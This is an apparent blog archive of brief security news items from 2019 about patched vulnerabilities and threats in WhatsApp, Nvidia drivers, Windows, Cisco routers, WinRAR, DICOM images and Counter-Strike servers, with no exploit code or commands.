Category Archives: Vulnerabilities


Since 2005 some Google G Suite passwords were stored in plaintext

Google says that there were a number of its enterprise customers since 2005 have had their Google G Suite passwords stored in plaintext.

 

G Suite, Google’s brand of cloud computing, software, productivity and collaboration tools has more than 5 million users as of February. Google said that it recently discovered the passwords for a “subset of enterprise G Suite customers” stored in plain text since 2005.

 

“This practice did not live up to our standards,” Suzanne Frey, VP of engineering for Google Cloud Trust, said in a post. “To be clear, these passwords remained in our secure encrypted infrastructure. This issue has been fixed and we have seen no evidence of improper access to or misuse of the affected passwords.”

Google said they also discovered a second security lapse earlier this month as they were troubleshooting new G Suite customer sign-ups. The company said since January it was … Read the rest


Patch That WhatsApp Zero-Day Exploit

Facebook has recently patched a critical zero-day exploit in WhatsApp, WhatsApp is urging users to update as soon as possible because hackers are able to exploit you remotely to install spyware on phones by calling the targeted device.

WhatsApp did not name the threat actor exploiting the CVE-2019-3568, it described the attackers as an “advanced cyber actor” that targeted “a select number of users.”

WhatsApp advisory confirmed Monday that the flaw – now patched – is a

WhatsApp buffer overflow vulnerability in WhatsApp’s VOIP stack, which allows remote code execution via specially crafted series of SRTCP [Secure Real Time Transport Protocol] packets sent to a target phone number.

“A buffer overflow vulnerability in WhatsApp VOIP stack allowed remote code execution via specially crafted series of SRTCP packets sent to a target phone number.” details provided by Facebook.

Facebook however did fix the issue with the release of WhatsApp … Read the rest


Everyone Needs To Patch 3 Nvidia Driver Flaws

If your a Business, Gamer or a regular awesome person using the Nivida Chipset you definitely need to patch the Nvidia driver as soon as possible because of the following 3 flaws. 

“[The driver] contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where the product does not properly synchronize shared data, such as static variables across threads, which can lead to undefined behavior and unpredictable data changes, which may lead to denial of service, escalation of privileges or information disclosure.”

The most severe of the flaws is the CVE‑2019‑5675. This flaw could be used to launch DoS attacks that could cripple the system, as well as give the hackers escalation privileges and disclose system information, from what was said on a Thursday advisory released by Nvidia.

The second flaw, CVE‑2019‑5676, exists in the driver’s software install package and is also rated high-severity. The software actually … Read the rest


Malware Can Hide Within DICOM Medical Images

It has been found that malware can now hide within DICOM medical images. These are the type of images that doctors look at when they do XRay, CT or MRI scans. 

The analysis named Markel Picado Ortiz was able to take advantage of the DICOM flaw which allows the “128-byte section at the beginning of the file, called the preamble” to be injected with malware. 

“By mixing in with protected health information malware can effectivelyexploit the data’s clinical and regulatory implications to evade detection and derail remediation attempts while creating a host of new concerns for security teams, healthcare organizations, and antivirus companies in the process,” Ortiz wrote.

“This vulnerability stands apart as one whose technical potency is derived from not just a software design flaw, but from the clinical and regulatory environment as well,” he added.

If hackers were to exploit the design flaw in DICOM, they’d be able … Read the rest


Windows Zero-Day Exploit

Windows has recently released a patch for a vulnerability exploit in the windows operating system which was unknown to many people until last week. The vulnerability would allow a hacker to open a door for full system control.

Discovered by Vasily Berdnikov and Boris Larin of Kaspersky Lab on St. Patrick’s Day this year, the flaw (CVE-2019-0859) is a use-after-free issue in the Windows kernel that allows local privilege escalation (LPE). It’s being used in advanced persistent threat (APT) campaigns targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10).

 

win32k!xxxFreeWindow+0x1344 on up-to-date Windows 7 SP1 x64

The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.

After a successful exploitation, the exploit executed PowerShell with a Base64 encoded command. … Read the rest


BAE Report States HUMAN ERROR still major Security Risk

BAE Systems has revealed that even though organizations have continued attempts to improve their cybersecurity, human error is still the major vulnerability towards an organizations network.

They compiled a report by speaking to board level executives, IT decision makers and security professionals to better understand what the current state of corporate incident response capabilities and readiness were.

What they found from their results was to be expected, the BAE Systems research showcased how the majority of organizational breaches are caused by human error. Hackers prey on the uninformed employees.

They have examined that the breaches caused by human error were at 71 percent due to phishing attacks and 65 percent were due to indirect virus and malware infections.

 

Response Teams Saw A Rise In incidents 

BAE Systems also noticed that incident response teams have been working with a number of incidents increases per month.

The research also revealed that many … Read the rest


Counter-Strike 1.6 servers used to push malware

Just about 39% of all Counter-Strike 1.6 servers were being used to push malware to end users. It’s amazing that still to this day counter-strike 1.6 is still being play after 20 years. The game still has many players and there is a high demand for hosting providers to provide players to rent game servers. 

 

Dr. Web, researchers explained that the developers are using the game clients vulnerabilities to push the Belonard Trojan botnet by deploying malicious servers to promote the game servers and enlist more victims to the botnet. At its peak, this botnet grew so large that approximately 39% of the 5,000 Counter-Strike 1.6 servers were compromised and looking to  infect more connected players.

 

“Using this pattern, the developer of the Trojan managed to create a botnet that makes up a considerable part of the CS 1.6 game servers,” stated the research by Dr. Web. “According to our

Read the rest

The 2019 Threat Report

The new norm with cybersecurity is discovering new attack methods and new threats which emerge daily and new vectors that are being tested by cyber criminals, according to the 2019 Webroot Threat Report.

According to the Webroot Threat Report:

  • 40 percent of malicious malware were found on good domains. , “Since legitimate websites are frequently compromised to host malicious content. Those who use intermediary devices without SSL inspection capabilities should be aware of potential loopholes in their security policies due to this behavior.”

 

  •  Home users are more than twice as likely be infected.
    Home users are not immune; their routers serve as the hub for networks and smart home devices (IoT), yet most users can’t log into their Linux-based routers to see what they are doing. Meanwhile a hacker can learn everything about a user’s environment, can redirect URLs, carry out man-in-the-middle attacks, and even inject cryptojacking scripts.
Read the rest

Cisco SOHO VPN Firewalls Vulnerable To Remote Code Execution

Recently Cisco has released several security software updates for the Cisco RV wireless VPN firewalls and routers to plug up a remote code execution flaw (CVE-2019-1663) that can be exploited by malicious HTTP requests

 
The Vulnerable Products
This vulnerability affects all releases of the following Cisco products prior to those listed in Fixed Releases:
  • RV110W Wireless-N VPN Firewall
  • RV130W Wireless-N Multifunction VPN Router
  • RV215W Wireless-N VPN Router

“The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user.”

Cisco did not mention if there was any available public code in the wild to be used to exploit the vulnerability. 

The flaw is quite … Read the rest


Users Affected by 19 Year Old WinRAR Flaw

WinRAR urges to update one of the worlds most popular compression software that had a flaw that 500 Million users in the past 19 years have been affected by and they finally released a patch for this flaw.

What is the vulnerability?

The UNACEv2.DLL vulnerability was discovered security researchers from Check Point Software and they noted that this impacts all WinRAR versions released in the last 19 years. The UNACEv2.DLL vulnerability allows a hacker to deliver a compromised compressed file to a user and once the user unzips the file it allows the execution of malware into the windows startup of a computer.

WinRAR has released WinRAR 5.70 Beta 2 which will address this vulnerability –tracked under the CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, and CVE-2018-20253 identifiers.

Read the rest